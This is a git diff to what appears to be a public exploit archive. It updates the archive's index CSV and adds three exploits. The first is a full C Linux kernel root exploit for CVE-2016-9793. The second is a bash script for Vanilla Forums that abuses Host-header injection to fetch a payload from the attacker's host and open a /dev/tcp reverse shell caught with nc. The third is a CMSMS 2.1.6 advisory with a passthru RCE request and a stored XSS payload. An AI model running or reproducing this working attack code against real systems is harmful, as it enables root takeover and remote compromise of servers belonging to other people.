diff --git a/files.csv b/files.csv index 95b9851b8..e1fa86aca 100644 --- a/files.csv +++ b/files.csv @@ -2549,7 +2549,7 @@ id,file,description,date,author,platform,type,port 20955,platforms/windows/dos/20955.pl,"Internet Download Manager - Memory Corruption",2012-08-31,Dark-Puzzle,windows,dos,0 20922,platforms/osx/dos/20922.txt,"Rumpus FTP Server 1.3.x/2.0.3 - Stack Overflow Denial of Service",2001-06-12,"Jass Seljamaa",osx,dos,0 20930,platforms/windows/dos/20930.c,"Microsoft Index Server 2.0 / Indexing Service (Windows 2000) - ISAPI Extension Buffer Overflow (PoC)",2001-06-18,Ps0,windows,dos,0 -20946,platforms/windows/dos/20946.txt,"Cerberus FTP Server 1.x - Buffer Overflow Denial of Service",2001-06-21,"Cartel Informatique Security Research Labs",windows,dos,0 +20946,platforms/windows/dos/20946.txt,"Cerberus FTP Server 1.x - Buffer Overflow Denial of Service",2001-06-21,Cartel,windows,dos,0 20949,platforms/windows/dos/20949.c,"1C: Arcadia Internet Store 1.0 - Denial of Service",2001-06-21,"NERF Security",windows,dos,0 20952,platforms/linux/dos/20952.c,"eXtremail 1.x/2.1 - Remote Format String (1)",2001-06-21,"Luca Ercoli",linux,dos,0 20957,platforms/windows/dos/20957.pl,"WarFTP Daemon 1.82 RC 11 - Remote Format String",2012-08-31,coolkaveh,windows,dos,0 @@ -8863,8 +8863,8 @@ id,file,description,date,author,platform,type,port 40759,platforms/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local,0 40741,platforms/windows/local/40741.py,"Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution",2016-11-08,R-73eN,windows,local,0 40765,platforms/windows/local/40765.cs,"Microsoft Windows - VHDMP Arbitrary Physical Disk Cloning Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0 -40788,platforms/linux/local/40788.txt,"Palo Alto Networks PanOS root_trace - Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0 -40789,platforms/linux/local/40789.txt,"Palo Alto Networks PanOS - root_reboot Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0 +40788,platforms/linux/local/40788.txt,"Palo Alto Networks PanOS - 'root_trace' Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0 +40789,platforms/linux/local/40789.txt,"Palo Alto Networks PanOS - 'root_reboot' Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0 40807,platforms/windows/local/40807.txt,"Huawei UTPS - Unquoted Service Path Privilege Escalation",2016-11-22,"Dhruv Shah",windows,local,0 40810,platforms/linux/local/40810.c,"Linux Kernel 2.6.18 - 'move_pages()' Information Leak",2010-02-08,spender,linux,local,0 40811,platforms/lin_x86-64/local/40811.c,"Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak",2009-10-04,spender,lin_x86-64,local,0 @@ -8979,7 +8979,8 @@ id,file,description,date,author,platform,type,port 41959,platforms/windows/local/41959.txt,"Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation",2017-05-03,LiquidWorm,windows,local,0 41972,platforms/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",windows,local,0 41973,platforms/linux/local/41973.txt,"Xen 64bit PV Guest - pagetable use-after-type-change Breakout",2017-05-08,"Google Security Research",linux,local,0 -41994,platforms/linux/local/41994.c,"Linux Kernel 4.8.0 - Packet Socket Local root Privilege Escalation",2017-05-11,"Andrey Konovalov",linux,local,0 +41994,platforms/linux/local/41994.c,"Linux Kernel 4.8.0 (Ubuntu) - Packet Socket Local Privilege Escalation",2017-05-11,"Andrey Konovalov",linux,local,0 +41995,platforms/linux/local/41995.c,"Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' & 'SO_RCVBUFFORCE' Local Privilege Escalation",2017-02-22,"Andrey Konovalov",linux,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -15498,7 +15499,8 @@ id,file,description,date,author,platform,type,port 41975,platforms/windows/remote/41975.txt,"Microsoft Security Essentials / SCEP (Microsoft Windows 8/8.1/10 / Windows Server) - 'MsMpEng' Remotely Exploitable Type Confusion",2017-05-09,"Google Security Research",windows,remote,0 41978,platforms/multiple/remote/41978.py,"Oracle GoldenGate 12.1.2.0.0 - Unauthenticated Remote Code Execution",2017-05-09,"Silent Signal",multiple,remote,0 41980,platforms/python/remote/41980.rb,"Crypttech CryptoLog - Remote Code Execution (Metasploit)",2017-05-09,Metasploit,python,remote,80 -41992,platforms/windows/remote/41992.rb,"Microsoft IIS WebDav - ScStoragePathFromUrl Overflow (Metasploit)",2017-05-11,Metasploit,windows,remote,0 +41992,platforms/windows/remote/41992.rb,"Microsoft IIS - WebDav 'ScStoragePathFromUrl' Overflow (Metasploit)",2017-05-11,Metasploit,windows,remote,0 +41996,platforms/php/remote/41996.sh,"Vanilla Forums < 2.3 - Remote Code Execution",2017-05-11,"Dawid Golunski",php,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -36101,7 +36103,7 @@ id,file,description,date,author,platform,type,port 38127,platforms/php/webapps/38127.php,"PHP 5.5.9 - cgimode fpm writeprocmemfile Bypass disable function",2015-09-10,ylbhz,php,webapps,0 38128,platforms/cgi/webapps/38128.txt,"Synology Video Station 1.5-0757 - Multiple Vulnerabilities",2015-09-10,"Han Sahin",cgi,webapps,5000 38129,platforms/php/webapps/38129.txt,"Octogate UTM 3.0.12 - Admin Interface Directory Traversal",2015-09-10,"Oliver Karow",php,webapps,0 -38130,platforms/java/webapps/38130.txt,"N-able N-central - Cross-Site Request Forgery",2012-12-13,"Cartel Informatique Security Research Labs",java,webapps,0 +38130,platforms/java/webapps/38130.txt,"N-able N-central - Cross-Site Request Forgery",2012-12-13,Cartel,java,webapps,0 38131,platforms/php/webapps/38131.txt,"PHP Address Book - 'group' Parameter Cross-Site Scripting",2012-12-13,"Kenneth F. Belva",php,webapps,0 38133,platforms/php/webapps/38133.txt,"WordPress Plugin RokBox Plugin - /wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf abouttext Parameter Cross-Site Scripting",2012-12-17,MustLive,php,webapps,0 38134,platforms/php/webapps/38134.txt,"Joomla! Component 'com_ztautolink' - 'Controller' Parameter Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0 @@ -37838,3 +37840,4 @@ id,file,description,date,author,platform,type,port 41988,platforms/php/webapps/41988.txt,"QNAP PhotoStation 5.2.4 / MusicStation 4.8.4 - Authentication Bypass",2017-05-10,"Kacper Szurek",php,webapps,8080 41989,platforms/php/webapps/41989.txt,"BanManager WebUI 1.5.8 - PHP Code Injection",2017-05-10,HaHwul,php,webapps,0 41990,platforms/php/webapps/41990.html,"Gongwalker API Manager 1.1 - Cross-Site Request Forgery",2017-05-10,HaHwul,php,webapps,0 +41997,platforms/php/webapps/41997.txt,"CMS Made Simple 2.1.6 - Multiple Vulnerabilities",2017-05-10,"Osanda Malith",php,webapps,0 diff --git a/platforms/linux/local/41995.c b/platforms/linux/local/41995.c new file mode 100755 index 000000000..3bebff536 --- /dev/null +++ b/platforms/linux/local/41995.c @@ -0,0 +1,176 @@ +// CAP_NET_ADMIN -> root LPE exploit for CVE-2016-9793 +// No KASLR, SMEP or SMAP bypass included +// Affected kernels: 3.11 -> 4.8 +// Tested in QEMU only +// https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793 +// +// Usage: +// # gcc -pthread exploit.c -o exploit +// # chown guest:guest exploit +// # setcap cap_net_admin+ep ./exploit +// # su guest +// $ whoami +// guest +// $ ./exploit +// [.] userspace payload mmapped at 0xfffff000 +// [.] overwriting thread started +// [.] sockets opened +// [.] sock->sk_sndbuf set to fffffe00 +// [.] writing to socket +// [+] got r00t +// # whoami +// root +// +// Andrey Konovalov + +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define COMMIT_CREDS 0xffffffff81079860ul +#define PREPARE_KERNEL_CRED 0xffffffff81079b20ul + +typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); +typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); + +_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS; +_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED; + +void get_root(void) { + commit_creds(prepare_kernel_cred(0)); +} + +struct ubuf_info_t { + uint64_t callback; // void (*callback)(struct ubuf_info *, bool) + uint64_t ctx; // void * + uint64_t desc; // unsigned long +}; + +struct skb_shared_info_t { + uint8_t nr_frags; // unsigned char + uint8_t tx_flags; // __u8 + uint16_t gso_size; // unsigned short + uint16_t gso_segs; // unsigned short + uint16_t gso_type; // unsigned short + uint64_t frag_list; // struct sk_buff * + uint64_t hwtstamps; // struct skb_shared_hwtstamps + uint32_t tskey; // u32 + uint32_t ip6_frag_id; // __be32 + uint32_t dataref; // atomic_t + uint64_t destructor_arg; // void * + uint8_t frags[16][17]; // skb_frag_t frags[MAX_SKB_FRAGS]; +}; + +// sk_sndbuf = 0xffffff00 => skb_shinfo(skb) = 0x00000000fffffed0 +#define SNDBUF 0xffffff00 +#define SHINFO 0x00000000fffffed0ul + +struct ubuf_info_t ubuf_info = {(uint64_t)&get_root, 0, 0}; +//struct ubuf_info_t ubuf_info = {0xffffdeaddeadbeeful, 0, 0}; +struct skb_shared_info_t *skb_shared_info = (struct skb_shared_info_t *)SHINFO; + +#define SKBTX_DEV_ZEROCOPY (1 << 3) + +void* skb_thr(void* arg) { + while (1) { + skb_shared_info->destructor_arg = (uint64_t)&ubuf_info; + skb_shared_info->tx_flags |= SKBTX_DEV_ZEROCOPY; + } +} + +int sockets[2]; + +void *write_thr(void *arg) { + // Write blocks until setsockopt(SO_SNDBUF). + write(sockets[1], "\x5c", 1); + + if (getuid() == 0) { + printf("[+] got r00t\n"); + execl("/bin/bash", "bash", NULL); + perror("execl()"); + } + printf("[-] something went wrong\n"); +} + +int main() { + void *addr; + int rv; + uint32_t sndbuf; + + addr = mmap((void *)(SHINFO & 0xfffffffffffff000ul), 0x1000ul, + PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, + -1, 0); + if (addr != (void *)(SHINFO & 0xfffffffffffff000ul)) { + perror("mmap()"); + exit(EXIT_FAILURE); + } + + printf("[.] userspace payload mmapped at %p\n", addr); + + pthread_t skb_th; + rv = pthread_create(&skb_th, 0, skb_thr, NULL); + if (rv != 0) { + perror("pthread_create()"); + exit(EXIT_FAILURE); + } + usleep(10000); + + printf("[.] overwriting thread started\n"); + + rv = socketpair(AF_LOCAL, SOCK_STREAM, 0, &sockets[0]); + if (rv != 0) { + perror("socketpair()"); + exit(EXIT_FAILURE); + } + + printf("[.] sockets opened\n"); + + sndbuf = SNDBUF; + rv = setsockopt(sockets[1], SOL_SOCKET, SO_SNDBUFFORCE, + &sndbuf, sizeof(sndbuf)); + if (rv != 0) { + perror("setsockopt()"); + exit(EXIT_FAILURE); + } + + printf("[.] sock->sk_sndbuf set to %x\n", SNDBUF * 2); + + pthread_t write_th; + rv = pthread_create(&write_th, 0, write_thr, NULL); + if (rv != 0) { + perror("pthread_create()"); + exit(EXIT_FAILURE); + } + usleep(10000); + + printf("[.] writing to socket\n"); + + // Wake up blocked write. + rv = setsockopt(sockets[1], SOL_SOCKET, SO_SNDBUF, + &sndbuf, sizeof(sndbuf)); + if (rv != 0) { + perror("setsockopt()"); + exit(EXIT_FAILURE); + } + usleep(10000); + + close(sockets[0]); + close(sockets[1]); + + return 0; +} \ No newline at end of file diff --git a/platforms/php/remote/41996.sh b/platforms/php/remote/41996.sh new file mode 100755 index 000000000..86e528a72 --- /dev/null +++ b/platforms/php/remote/41996.sh @@ -0,0 +1,211 @@ +#!/bin/bash +# +# __ __ __ __ __ +# / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________ +# / / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/ +# / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ ) +# /_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/ +# /____/ +# +# +# Vanilla Forums <= 2.3 Remote Code Execution (RCE) PoC Exploit 0day +# Core version (no plugins, default config.) +# +# CVE-2016-10033 (RCE) +# CVE-2016-10073 (Header Injection) +# +# vanilla-forums-rce-exploit.sh (ver. 1.0) +# +# +# Discovered and coded by +# +# Dawid Golunski +# https://legalhackers.com +# https://twitter.com/dawid_golunski +# +# ExploitBox project: +# https://ExploitBox.io +# +# +# Exploit code: +# https://exploitbox.io/exploit/vanilla-forums-rce-exploit.sh +# +# Full advisory URL: +# https://exploitbox.io/vuln/Vanilla-Forums-Exploit-RCE-0day-Remote-Code-Exec-CVE-2016-10033.html +# +# Related advisories: +# https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html +# https://exploitbox.io/vuln/Vanilla-Forums-Exploit-Host-Header-Injection-CVE-2016-10073-0day.html +# +# White-paper 'Pwning PHP mail() function For Fun And RCE' +# https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html +# +# +# Usage: +# ./vanilla-forums-rce-exploit.sh target-forum-url reverse_shell_ip +# +# Tested on: +# Vanilla Core 2.3 +# https://open.vanillaforums.com/addon/vanilla-core-2.3 +# +# Disclaimer: +# For testing purposes only +# +# +# ----------------------------------------------------------------- +# +# Interested in vulnerabilities/exploitation? +# +# +# .;lc' +# .,cdkkOOOko;. +# .,lxxkkkkOOOO000Ol' +# .':oxxxxxkkkkOOOO0000KK0x:' +# .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;. +# ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl. +# '';ldxxxxxdc,. ,oOXXXNNNXd;,. +# .ddc;,,:c;. ,c: .cxxc:;:ox: +# .dxxxxo, ., ,kMMM0:. ., .lxxxxx: +# .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx: +# .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx: +# .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx: +# .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx: +# .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx: +# .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx: +# .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx: +# .dxxxxxdl;. ., .. .;cdxxxxxx: +# .dxxxxxxxxxdc,. 'cdkkxxxxxxxx: +# .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,. +# .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:. +# .':oxxxxxxxxx.ckkkkkkkkxl,. +# .,cdxxxxx.ckkkkkxc. +# .':odx.ckxl,. +# .,.'. +# +# Subscribe at: +# +# https://ExploitBox.io +# +# https://twitter.com/Exploit_Box +# +# ----------------------------------------------------------------- + +intro=" +DQobWzBtIBtbMjFDG1sxOzM0bSAgICAuO2xjJw0KG1swbSAbWzIxQxtbMTszNG0uLGNka2tPT09r +bzsuDQobWzBtICAgX19fX19fXxtbOEMbWzE7MzRtLiwgG1swbV9fX19fX19fG1s1Q19fX19fX19f +G1s2Q19fX19fX18NCiAgIFwgIF9fXy9fIF9fX18gG1sxOzM0bScbWzBtX19fXBtbNkMvX19fX19c +G1s2Q19fX19fX19cXyAgIF8vXw0KICAgLyAgXy8gICBcXCAgIFwvICAgLyAgIF9fLxtbNUMvLyAg +IHwgIFxfX19fXy8vG1s3Q1wNCiAgL19fX19fX19fXz4+G1s2QzwgX18vICAvICAgIC8tXCBfX19f +IC8bWzVDXCBfX19fX19fLw0KIBtbMTFDPF9fXy9cX19fPiAgICAvX19fX19fX18vICAgIC9fX19f +X19fPg0KIBtbNkMbWzE7MzRtLmRkYzssLDpjOy4bWzlDG1swbSxjOhtbOUMbWzM0bS5jeHhjOjs6 +b3g6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eG8sG1s1QxtbMG0uLCAgICxrTU1NMDouICAuLBtb +NUMbWzM0bS5seHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1QxtbMG1sVy4gb01N +TU1NTU1LICBkMBtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1 +QxtbMG0uMGsuLEtXTU1NV05vIDpYOhtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDLhtbMTsz +NG1keHh4eHhjG1s2QxtbMG0ueE4weHh4eHh4eGtYSywbWzZDG1szNG0ueHh4eHh4Og0KG1szN20g +G1s2Qy4bWzE7MzRtZHh4eHh4YyAgICAbWzBtbGRkT01NTU1XZDBNTU1NS2RkZC4gICAbWzM0bS54 +eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s2QxtbMG0uY05NTU1OLm9NTU1NeCcb +WzZDG1szNG0ueHh4eHh4Og0KG1szN20gG1s2QxtbMTszNG0uZHh4eHh4YxtbNUMbWzBtbEtvO2RO +TU4ub01NMDs6T2suICAgIBtbMzRtJ3h4eHh4eDoNChtbMzdtIBtbNkMbWzE7MzRtLmR4eHh4eGMg +ICAgG1swbTtNYyAgIC5seC46bywgICAgS2wgICAgG1szNG0neHh4eHh4Og0KG1szN20gG1s2Qxtb +MTszNG0uZHh4eHh4ZGw7LiAuLBtbMTVDG1swOzM0bS4uIC47Y2R4eHh4eHg6DQobWzM3bSAbWzZD +G1sxOzM0bS5keHh4eCAbWzBtX19fX19fX18bWzEwQ19fX18gIF9fX19fIBtbMzRteHh4eHg6DQob +WzM3bSAbWzdDG1sxOzM0bS4nOm94IBtbMG1cG1s2Qy9fIF9fX19fX19fXCAgIFwvICAgIC8gG1sz +NG14eGMsLg0KG1szN20gG1sxMUMbWzE7MzRtLiAbWzBtLxtbNUMvICBcXBtbOEM+G1s3QzwgIBtb +MzRteCwNChtbMzdtIBtbMTJDLxtbMTBDLyAgIHwgICAvICAgL1wgICAgXA0KIBtbMTJDXF9fX19f +X19fXzxfX19fX19fPF9fX18+IFxfX19fPg0KIBtbMjFDG1sxOzM0bS4nOm9keC4bWzA7MzRtY2t4 +bCwuDQobWzM3bSAbWzI1QxtbMTszNG0uLC4bWzA7MzRtJy4NChtbMzdtIA0K" + + +function prep_host_header() { + cmd="$1" + rce_cmd="\${run{$cmd}}"; + + # replace / with ${substr{0}{1}{$spool_directory}} + #sed 's^/^${substr{0}{1}{$spool_directory}}^g' + rce_cmd="`echo $rce_cmd | sed 's^/^\${substr{0}{1}{\$spool_directory}}^g'`" + + # replace ' ' (space) with + #sed 's^ ^${substr{10}{1}{$tod_log}}$^g' + rce_cmd="`echo $rce_cmd | sed 's^ ^\${substr{10}{1}{\$tod_log}}^g'`" + #return "target(any -froot@localhost -be $rce_cmd null)" + host_header="target(any -froot@localhost -be $rce_cmd null)" + return 0 +} + + +echo "$intro" | base64 -d + +if [ "$#" -ne 2 ]; then + echo -e "Usage:\n$0 target-forum-url reverse_shell_ip\n" + exit 1 +fi +target="$1" +rev_host="$2" + + +echo -e ' \e[44m| ExploitBox.io |\e[0m' +echo -e " +\e[94m+ --=|\e[0m \e[91m Vanilla Forums <= 2.3 Unauth. RCE Exploit \e[0m \e[94m|\e[0m" +#sleep 1s +echo -e "\e[94m+ --=|\e[0m \e[94m|\e[0m +\e[94m+ --=|\e[0m Discovered & Coded By \e[94m|\e[0m +\e[94m+ --=|\e[0m \033[94mDawid Golunski\033[0m \e[94m|\e[0m +\e[94m+ --=|\e[0m \033[94mhttps://legalhackers.com\033[0m \e[94m|\e[0m +\e[94m+ --=|\e[0m \033[94m@dawid_golunski\033[0m \e[94m|\e[0m +\e[94m+ --=|\e[0m \e[94m|\e[0m +\e[94m+ --=|\e[0m \"With Great Power Comes Great Responsibility\" \e[94m|\e[0m +\e[94m+ --=|\e[0m \e[91m*\e[0m For testing purposes only \e[91m*\e[0m \e[94m|\e[0m + +" + +echo -ne "\e[91m[*]\033[0m" +read -p " Sure you want to get a shell on the target '$target' ? [y/N] " choice +echo +if [ "$choice" == "y" ]; then + + echo -e "\e[92m[*]\033[0m Guess I can't argue with that... Let's get started...\n" + #sleep 2s + #sleep 2s + + # Host payload on :80 + RCE_exec_cmd="(sleep 5s && nohup bash -i >/dev/tcp/$rev_host/1337 0<&1 2>&1) &" + echo "$RCE_exec_cmd" > rce.txt + python -mSimpleHTTPServer 80 2>/dev/null >&2 & + hpid=$! + + # POST data string + data='hpt=&Target=discussions&Email=admin&Request+a+new+password=Request+a+new+password&DeliveryType=VIEW&DeliveryMethod=JSON' + + # Save payload on the target in /tmp/rce + cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt" + prep_host_header "$cmd" + curl -H"Host: $host_header" -0 -s -i -d "$data" $target/entry/passwordrequest | grep -q "200 OK" + if [ $? -ne 0 ]; then + echo "[!] Failed conecting to the target URL. Exiting" + exit 2 + fi + echo -e "\e[92m[+]\033[0m Connected to the target" + echo -e "\n\e[92m[+]\e[0m Payload sent successfully" + sleep 2s + + # Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce + cmd="/usr/bin/nohup /bin/bash /tmp/rce" + prep_host_header "$cmd" + #echo -e "Host Payload2: \nHost: $host_header" + curl -H"Host: $host_header" -s -0 -i -d "$data" $target/entry/passwordrequest >/dev/null 2>&1 & + echo -e "\n\e[92m[+]\033[0m Payload executed!" + + echo -e "\n\e[92m[*]\033[0m Waiting for the target to send us a \e[94mreverse shell\e[0m...\n" + nc -vv -l 1337 + #killall python + echo +else + echo -e "\e[92m[+]\033[0m Responsible choice ;) Exiting.\n" + exit 0 + +fi + #kill -9 $hpid + +echo "Exiting..." +exit 0 \ No newline at end of file diff --git a/platforms/php/webapps/41997.txt b/platforms/php/webapps/41997.txt new file mode 100755 index 000000000..55c2abb42 --- /dev/null +++ b/platforms/php/webapps/41997.txt @@ -0,0 +1,30 @@ +# Title: CMSMS 2.1.6 Multiple Vulnerabilities +# Date: 10-05-2017 +# Tested on: Windows 8 64-bit +# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith) +# Original write-up: https://osandamalith.com/2017/05/11/cmsms-2-1-6-multiple-vulnerabilities/ +# CVE: CVE-2017-8912 + +Remote Code Execution +====================== + +POST /cmsms/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4 HTTP/1.1 + +_sk_=2a7da2216d41e0ac&userplugin_id=4&userplugin_name=aaa&code=passthru('dir')%3B&description=&run=1&apply=1&ajax=1 + + +Stored XSS +========== + +POST /cmsms/admin/addgroup.php HTTP/1.1 + +_sk_=92a32a8aaa87e958&group=%3Csvg%2Fonload%3Dalert%282%29%3E&description=%22%3E%3Csvg%2Fonload%3Dalert%283%29%3E&active=on&addgroup=true + + +Disclosure Timeline +==================== + +09-05-2017: Reported to the vendor +09-05-2017: Vendor doesn't accept XSS issues inside admin panel and claimed the RCE as a feature, not a bug :) +10-05-2017: Public disclosure +11-05-2017: Assigned CVE-2017-8912 \ No newline at end of file